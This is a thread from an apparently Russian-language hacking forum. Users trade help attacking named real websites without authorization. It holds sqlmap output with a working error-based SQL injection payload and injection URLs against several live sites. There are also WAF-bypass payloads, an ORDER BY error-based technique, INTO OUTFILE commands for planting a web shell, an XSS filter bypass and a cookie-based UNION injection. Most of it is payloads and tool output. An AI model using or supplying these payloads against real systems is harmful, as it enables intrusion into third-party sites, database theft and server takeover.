[20:52:46] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; SunOS i86pc; fr; rv:1.9.0.4) Gecko/2008111710 Firefox/3.0.4'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[20:52:47] [INFO] testing connection to the target URL
[20:52:53] [INFO] heuristics detected web page charset 'ascii'
[20:52:53] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:52:54] [INFO] heuristic (XSS) test shows that (custom) POST parameter '#1*' might be vulnerable to XSS attacks
[20:52:54] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[20:52:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:52:55] [WARNING] reflective value(s) found and filtering out
[20:53:01] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[20:53:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:53:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:53:30] [INFO] target URL appears to be UNION injectable with 1 columns
[20:53:34] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[20:54:02] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[20:54:23] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[20:54:44] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[20:55:03] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[20:55:23] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[20:55:42] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
[20:56:08] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[20:56:15] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[20:56:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:56:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:56:33] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[20:56:38] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[20:56:43] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[20:56:48] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[20:56:53] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[20:56:58] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[20:57:03] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[20:57:08] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 400 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: nickname=&gender_id=1 AND (SELECT 9140 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(9140=9140,1))),0x71767a7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&region_id=city_2466&cv=Geef hier een omschrijving van jezelf.&coupon[]=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
---
[20:57:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0

Опять же идет редирект ,такое ощущение что все из-за него

[CODE]
Code:
http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
$ sqlmap -u "http://chatgirl.nl/account/doLogin" --data="nickname=&gender_id=1*&region_id=city_2466&cv=Geef+hier+een+omschrijving+van+jezelf.&coupon%5B%5
D=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium" --random-agent --level 5 --technique=EU --dbms=MySQL --risk 3 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-341d2a6}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 20:57:19

[20:57:19] [INFO] fetched random HTTP User-Agent header from file 'D:\Pentest\Sql_inj\PentestBox\bin\WebApplications \sqlmap\txt\user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[20:57:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://chatgirl.nl/welcome/chat_closed'. Do you want to follow? [Y/n] n
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: nickname=&gender_id=1 AND (SELECT 9140 FROM(SELECT COUNT(*),CONCAT(0x71707a7071,(SELECT (ELT(9140=9140,1))),0x71767a7871,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&region_id=city_2466&cv=Geef hier een omschrijving van jezelf.&coupon[]=&username=&password=&screen_resolution=800x400&os=Windows&screen_size=medium
---
[20:57:22] [INFO] testing MySQL
[20:57:23] [WARNING] the back-end DBMS is not MySQL
[20:57:23] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point

OxoTnik
28.06.2015, 22:11
Редирект там может быть по многим причинам, может из-за ошибки, может из-за того что не авторизован, просто когда выдаст редирект, попробуй сделать отказ от переадрисаций

Xsite
28.06.2015, 22:14
OxoTnik said:
↑ (https://antichat.live/posts/3863282/)
Редирект там может быть по многим причинам, может из-за ошибки, может из-за того что не авторизован, просто когда выдаст редирект, попробуй сделать отказ от переадрисаций


так я и отказываюсь ,просто не понимаю бред какой то

http://chatgirl.nl/account/doLogin скуля тут в посте

http://chatgirl.nl/welcome/chat_closed редирект идет суда

как закрывает доступ напрочь к http://chatgirl.nl/account/doLogin

+ удалил папку в оутпут , поставил снова раскручивать ,теперь пишет

the web server responded with an HTTP error code (503) which could interfere with the results of the tests

и не раскручивает

OxoTnik
28.06.2015, 22:28
Да муторно sqlmap не тащит, ему нужны кукисы от авторизованного браузера, которые он быстро теряет

хз как, но после 5 минут тыкания он перестал редеректить, после этого перенёс кукисы из браузера в sqlmap, тогда стало нормально, но потом опять та же процедура.

нормально можно обработать в ручную, Firefox -> tamper data

Br@!ns
30.06.2015, 11:08
Помогите waf обойти и вывод получить

http://www.haynes.com/products?sear...odel=BT125-3'+and+substr(version(),1,1)=5+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+substr(version(),1,1)=5+--+)

http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+order+by+2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+order+by+2+--+)

DezMond™
30.06.2015, 14:21
http://www.arboe.at/index.php?id=9528&catId=176+/**/OrdEr/**//**/+by+1+--+&origin=search&no_cache=1

У кого получиться фильтр обойти?

reuvenmatbil
02.07.2015, 14:55
В админке есть возможность редактировать html

не могу найти html загрузчик

кто может подсказать код?

frank
02.07.2015, 15:16
reuvenmatbil said:
↑ (https://antichat.live/posts/3864444/)
В админке есть возможность редактировать html
не могу найти html загрузчик
кто может подсказать код?


Я может не так понял конечно, вы это имели ввиду?


Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov

reuvenmatbil
02.07.2015, 15:41
frank said:
↑ (https://antichat.live/posts/3864451/)
Я может не так понял конечно, вы это имели ввиду?

Code:
http://htmlbook.ru/samhtml5/formy/zagruzka-failov



да, он, но файл не хочет загружаться

kingbeef
02.07.2015, 16:30
Ты никак не загрузишь файл через html.

reuvenmatbil
02.07.2015, 17:01
kingbeef said:
↑ (https://antichat.live/posts/3864485/)
Ты никак не загрузишь файл через html.


стоит движок FCKeditor

можно только редактировать хтмл

то что на форуме обсуждали

/threads/314734/ (https://antichat.live/threads/314734/)

/thread170379.html (https://antichat.live/threads/170379/)

/threadnav141783-2-10.html (https://antichat.live/threads/141783/page-2/)

не подошло

DezMond™
02.07.2015, 19:43
Хелп

http://www.klassik-stiftung.de/fors...ications_pi1[searchForm][orderDirection]=DESC (http://www.klassik-stiftung.de/forschung/publikationen/?tx_lombscientificpublications_pi1%5Baction%5D=sea rch&tx_lombscientificpublications_pi1%5Bcontroller%5D= Publication&cHash=066e98e19f8243d9778de7a9a6c95062&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BextensionName%5D=LombScientificPublications&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BcontrollerName%5D=Publication&tx_lombscientificpublications_pi1%5B__referrer%5D% 5BactionName%5D=search&tx_lombscientificpublications_pi1%5B__hmac%5D=a%3A 3%3A%7Bs%3A10%3A%22searchForm%22%3Ba%3A9%3A%7Bs%3A 14%3A%22orderDirection%22%3Bi%3A1%3Bs%3A9%3A%22sor tField%22%3Bi%3A1%3Bs%3A7%3A%22keyword%22%3Bi%3A1% 3Bs%3A5%3A%22title%22%3Bi%3A1%3Bs%3A6%3A%22author% 22%3Bi%3A1%3Bs%3A7%3A%22company%22%3Bi%3A1%3Bs%3A4 %3A%22isbn%22%3Bi%3A1%3Bs%3A8%3A%22category%22%3Bi %3A1%3Bs%3A9%3A%22connector%22%3Bi%3A1%3B%7Ds%3A6% 3A%22action%22%3Bi%3A1%3Bs%3A10%3A%22controller%22 %3Bi%3A1%3B%7D484b31c758eedeaf61a8ed70991aa41cf7ef 92e9&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bauthor%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bcompany%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bisbn%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bconnector%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5BsortField%5D=2&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bcategory%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Btitle%5D=1&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5Bkeyword%5D=a&tx_lombscientificpublications_pi1%5BsearchForm%5D% 5BorderDirection%5D=DESC)'

XAMEHA
02.07.2015, 20:23
DezMond™ said:
↑ (https://antichat.live/posts/3864560/)
Хелп


Инъекция в ORDER BY, Error-based;


Code:
DESC,error-based
DESC, updatexml(1, concat(0x3A, version()), 1)

reuvenmatbil,Никак нельзя. Ваш вопрос, более того, некорректен.

XAMEHA
02.07.2015, 21:30
DezMond™ said:
↑ (https://antichat.live/posts/3863746/)
У кого получиться фильтр обойти?


За это конечно спасибо. Вариантов, как обычно, несколько.


Code:
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/ SELECT UNHEX /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/('3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923')&origin=search&no_cache=1
index.php?id=9528&catId=177 UNION /*I j n t e h h n f d j i e v o m i r v e r a e l l e r i r e c t a t z u n d o p t i k n n e n*/ SELECT x'3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1
index.php?id=9528&catId=177.0UNION/**/SELECT x'3629554E494F4E2053454C45435420312C322C332C342C35 2C362C372C382C392C302C312C76657273696F6E28292C332C 342C352C362C372C382C392C302C312C342C332C342C352C36 2C372C382C392C302C312C352C332C342C352C362C372C382C 392C302C312C362C332C342C352C362C372C382C392C302C31 2C372C332C342C352C362C372C382C3923'&origin=search&no_cache=1

MySQL 5.5.27.

XAMEHA
02.07.2015, 21:47
Br@!ns said:
↑ (https://antichat.live/posts/3863698/)
Помогите waf обойти и вывод получить


А где вы SQL Injection обнаружили? Вроде чисто.

Br@!ns
02.07.2015, 22:55
XAMEHA said:
↑ (https://antichat.live/posts/3864606/)
А где вы SQL Injection обнаружили? Вроде чисто.


ну как.

http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=1+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+1=1+--+) - TRUE

http://www.haynes.com/products?sear...=2009&make=Boatian&model=BT125-3'+and+1=2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+and+1=2+--+) - FALSE

А так же http://www.haynes.com/products?sear...09&make=Boatian&model=BT125-3'+Order+by+2+--+ (http://www.haynes.com/products?searchType=vehicleApplicationSearch2&searchEnd=yes&sfID1=&sfID2=&sfID3=&year=2009&make=Boatian&model=BT125-3'+Order+by+2+--+) - TRUE

новость вылазиет при true. так же при некоторых командах вылазиет белая страничка

2) А тут можно что нибудь сделать?

http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr(123,1,1)=1+--+

http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+order+by+1+--+

http://www.ok.gov/triton/modules/newsroom/newsroom.php?id=109+and+substr('a',1,1)='a'

XAMEHA
03.07.2015, 05:53
Br@!ns said:
↑ (https://antichat.live/posts/3864645/)
ну как.
новость вылазиет при true. так же при некоторых командах вылазиет белая страничка


Всегда белая страница. Может быть вы HTTP запросы приведете?


Br@!ns said:
↑ (https://antichat.live/posts/3864645/)
2) А тут можно что нибудь сделать?


Копайте в сторону Oracle.

Br@!ns
03.07.2015, 08:12
XAMEHA said:
↑ (https://antichat.live/posts/3864712/)
Всегда белая страница. Может быть вы HTTP запросы приведете?



.SpoilerTarget" type="button">Spoiler: img
http://clip2net.com/clip/m0/93258-clip-152kb.jpg
в FireFox действительно все белое, Опера нормально отображает

faza02
03.07.2015, 10:35
XAMEHA said:
↑ (https://antichat.live/posts/3864712/)
Всегда белая страница. Может быть вы HTTP запросы приведете?


нужна реальная кавычка, не урленкод

vikler
04.07.2015, 04:39
Code:
http://www.everynight.co.uk/imageViewer.asp?imageID=11206 and 1=1

В общем... Access, брут tables ничего не нашёл. Что делать дальше?

Filipp
05.07.2015, 19:45
Есть Blind'овая скуля, проверил права -- ROOT. Нашел phpinfo, оттуда взял путь, нашел врайтабельную папку, вроде как все норм. Кручу sqlmap'ом ибо руками блайнд крутить это маразм. Попробовал залить шелл и наткнулся на не очень приятный момент, sqlmap не спрашивает путь для заливки шелла. Скуля в поле password, а там функция шифрования в md5 дает ошибку с раскрытием путей. Sqlmap берет этот путь и пытается залить шелл по тому пути, а меня не спрашивает. Как указать кастомный путь в таком случае?

BigBear
05.07.2015, 20:48
Заливайте безо всяких SQLMap.

Просто используйте конструкцию

union select '' into outfile '/' , независимо от вывода результата.

Возможно, придётся поподбирать количество столбцов.

Остальных проблем, судя по вашему рассказу (MQ off, FilePriv on, FPD true), нет. Всё должно получиться.

faza02
05.07.2015, 23:27
Code:
1 limit 1 into outfile '/path/to/shell.php' lines terminated by ""--+

https://rdot.org/forum/showthread.php?t=60

man4747
06.07.2015, 08:19
тут можно что нибудь сделать?

http://www.air.am/en/your-itinerary/15'/

Br@!ns
06.07.2015, 10:46
man4747 said:
↑ (https://antichat.live/posts/3865526/)
тут можно что нибудь сделать?
http://www.air.am/en/your-itinerary/15'/


а где там уязвимость?

man4747
06.07.2015, 12:23
страница изменяется

http://www.air.am/en/your-itinerary/15/ => http://www.air.am/en/your-itinerary/15'/

Br@!ns
06.07.2015, 15:13
man4747 said:
↑ (https://antichat.live/posts/3865566/)
страница изменяется
http://www.air.am/en/your-itinerary/15/
=>
http://www.air.am/en/your-itinerary/15'/


http://www.air.am/en/your-itinerary/15kj/ (http://www.air.am/en/attention/57k/) - так же изменяется, и кавычка тут непричем

ocheretko
07.07.2015, 00:17
Code:
">

Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?

faza02
07.07.2015, 01:18
ocheretko said:
↑ (https://antichat.live/posts/3865815/)

Code:
">

Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?


где сам инъект? на что там waf?

ocheretko
07.07.2015, 01:24
Вывод

">

Что Вы имеете ввиду под вопросом "где сам инъект?".

waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега

faza02
07.07.2015, 02:02
ocheretko said:
↑ (https://antichat.live/posts/3865831/)
Вывод
">
Что Вы имеете ввиду под вопросом "где сам инъект?".
waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега


как вариант: %0C

POC: http://jsfiddle.net/4qgk5qyj/

ocheretko
07.07.2015, 04:01
Code:
">

%0C так и остается в исходном коде, также как и пробел заменяется на %20

faza02
07.07.2015, 09:24
ocheretko said:
↑ (https://antichat.live/posts/3865844/)

Code:
">

%0C так и остается в исходном коде, также как и пробел заменяется на %20


отправьте данные через сниффер, например burp. и скиньте уже сайт в лс

ocheretko
07.07.2015, 13:29
Code:
GET /search/%22%3E%3Cimg%20srcset%3D%22%2C%2C%2C%2C%2Cx%22oner ror%3D%22alert(1)%22%3E HTTP/1.1
Host: *********
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: *********
Cookie: PHPSESSID=p7f3b38uuh1icqqqndscb75a10; Lang=ru; ShopID=37; __utma=244353110.90581892.1436196504.1436227051.14 36260016.5; __utmc=244353110; __utmz=244353110.1436196504.1.1.utmcsr=(direct)|ut mccn=(direct)|utmcmd=(none); jv_enter_ts_dUv23LxxhD=1436196515709; jv_visits_count_dUv23LxxhD=1; jv_pages_count_dUv23LxxhD=107; jv_gui_state_dUv23LxxhD=WIDGET; jv_cm_dUv23LxxhD=ws; jv_client_id_dUv23LxxhD=242556.2oZiZbl%2Bz3jZ%2Fn3 i7hwsPj8u5Hm4%2Byfv2aQVwObJGqY; jv_invitation_time_dUv23LxxhD=1436260532076; jv_close_time_dUv23LxxhD=1436220689308; __utmb=244353110.14.9.1436260532079; _ym_visorc_20996566=w; jv_sess_id_dUv23LxxhD=sbd62ebf98ea95eb5d817667c74a 59689; __utmt=1
Connection: keep-alive

lindau
08.07.2015, 15:34
Привет всем! Подскажите тут есть скуль?

http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+1--+

http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+10--+

Там по моему фильтр на Union select стоит, не могу обойти никак

faza02
08.07.2015, 16:37
lindau said:
↑ (https://antichat.live/posts/3866284/)
Привет всем! Подскажите тут есть скуль?
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+1--+
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+order+by+10--+
Там по моему фильтр на Union select стоит, не могу обойти никак


увы, вывода нет.


Code:
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+

lindau
08.07.2015, 18:19
yarbabin said:
↑ (https://antichat.live/posts/3866302/)
увы, вывода нет.

Code:
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+



Вот жеж беда =((

Для посимвольного перебора тогда получается так: http://www.heritage.am/ru/component...*/+and+substring((select+version()),1,1)=5--+ (http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61/*%00*/+and+substring((select+version()),1,1)=5--+) ?

Это ведь Joomla, стандартная таблица jos_users?

djon
08.07.2015, 20:56
Почему когда пробую отправить файл через форму







ссылка преобразуется так www.site.ru/?file=dk.php (http://www.site.ru/?file=dk.php) и файл или картинка не запускается,просто обычную страницу грузит

faza02
08.07.2015, 22:27
djon said:
↑ (https://antichat.live/posts/3866382/)
Почему когда пробую отправить файл через форму

ссылка преобразуется так
www.site.ru/?file=dk.php (http://www.site.ru/?file=dk.php)
и файл или картинка не запускается,просто обычную страницу грузит


начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл

djon
09.07.2015, 02:37
-------------------------------------------------------------------------------------------------------------------------------------------------

Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to 'http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12

-------------------------------------------------------------------------------------------------------------------------------------------------

сама форма

-------------------------------------------------------------------------------------------------------------------------------------------------







-------------------------------------------------------------------------------------------------------------------------------------------------

сам upload.php

-------------------------------------------------------------------------------------------------------------------------------------------------

1024*3*1024)

{

echo ("Размер файла превышает три мегабайта");

exit;

}

// Проверяем загружен ли файл

if(is_uploaded_file($_FILES["filename"]["tmp_name"]))

{

// Если файл загружен успешно, перемещаем его

// из временной директории в конечную

move_uploaded_file($_FILES["filename"]["tmp_name"], "http://www.site.ru/p1/".$_FILES["filename"]["name"]);

} else {

echo("Ошибка загрузки файла");

}

?>

-------------------------------------------------------------------------------------------------------------------------------------------------

SaNDER
09.07.2015, 08:53
.SpoilerTarget" type="button">Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь

Сведения об уязвимости

обнаружено, что данные пароля передаются через HTTP.

влияние

Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.

Действия, чтобы Взять

См средство для решения.

Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.

средство

Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.

Форма цель действия :

http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? .

Есть HTML код страницы

.SpoilerTarget" type="button">Spoiler
?

















******.ru › Войти













*******.ru

-->









Имя пользователя







Пароль





Запомнить меня











Регистрация | Забыли пароль?

function wp_attempt_focus(){

setTimeout( function(){ try{

d = document.getElementById('user_login');

d.focus();

d.select();

} catch(e){}

}, 200);

}

wp_attempt_focus();

if(typeof wpOnload=='function')wpOnload();

document.write("")

← Назад к сайту «*******.ru»











Не знаю поможет ли это :

GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1

Cache-Control: no-cache

Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id} (http://*****.ru/wp-admin/post.php?action=edit&post=%7Bpost-id%7D)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker

Accept-Language: en-us,en;q=0.5

X-Scanner: ******

Host: ****.ru

Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d

Accept-Encoding: gzip, deflate

---------------------------------------------------------------------------------------

robots.txt :

User-agent: *

Disallow: /cgi-bin/

Disallow: /wp-admin/

Allow: /doc/

Allow: /img/

Allow: /wp-content/uploads/

-------------------------------------------

Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.

HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )

влияние

Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.

Действия, чтобы Взять

См средство для решения.

Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).

средство

Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.

Внешние ссылки

Как это сделать ? .

-----------------------------------------------------------------------------------

Url http://*******.ru/wp-login.php?action=lostpassword (http://helpset.ru/wp-login.php?action=lostpassword)

Identified Field Name user_login .

Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.

Это были важные поля, такие как "кредитная карта".

Влияние

Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.

Действия, чтобы Взять

Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.

Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.

Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.

Требуемые навыки для успешной эксплуатации

Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.

Внешние ссылки

Использование автозаполнения в HTML форм

П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .

-----------------------------------------------------------------------

Url http://*******.ru/crossdomain.xml

Правила политики

Классификация Классификация

OWASP 2010 A6

OWASP 2013 А5

КВО 16

WASC 15

Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.

влияние

Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.

средство

Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.

Внешние ссылки

Рекомендации по использованию файла политики кросс-доменных для Flash Player

Crossdomain.xml приглашает Cross-Site Mayhem .

Как это сделать?

[/spoiler=Инфа которая поможет]

Br@!ns
09.07.2015, 10:20
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep (https://www.polyvinylrecords.com/webservices/v1/cart/create/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep)

.SpoilerTarget" type="button">Spoiler: POST
Host: www.polyvinylrecords.com (http://www.polyvinylrecords.com)

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1

Connection: keep-alive

Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?

BigBear
09.07.2015, 11:47
Br@!ns said:
↑ (https://antichat.live/posts/3866494/)
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep (https://www.polyvinylrecords.com/webservices/v1/cart/create/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep)
Spoiler: POST
Host:
www.polyvinylrecords.com (http://www.polyvinylrecords.com)
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
